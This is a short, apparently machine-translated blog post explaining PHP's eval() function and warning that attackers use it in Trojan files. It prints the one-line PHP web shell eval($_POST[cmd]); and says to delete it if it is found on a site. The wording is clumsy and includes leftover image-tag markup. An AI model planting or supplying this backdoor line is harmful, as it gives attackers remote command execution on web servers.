Hackers use most of the sentence, you can parse PHP. Many Trojan files are done in this way,
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/59/EE/wKioL1TwLf3BicfYAAyPJh9spQg206.jpg "title=" Hack.png "alt=" Wkiol1twlf3bicfyaaypjh9spqg206.jpg "/>
Above is a PHP big horse file,
The eval () function calculates the string according to the PHP code.
The string must be a valid PHP code and must end with a semicolon.
If no return statement is called in the code string, NULL is returned. If there is a parsing error in the code, the eval () function returns FALSE.
For security reasons, it is not recommended that you use it in development.
The following sentence is the simplest code, the risk is super high, we sometimes see our own site has such a sentence:
Eval ($_post[cmd]); #这个就是php中的一句话木马, if found, delete immediately
This article is from my blog blog, so be sure to keep this source http://ningyuqiao.blog.51cto.com/5581274/1615717
Introduction to eval function usage in PHP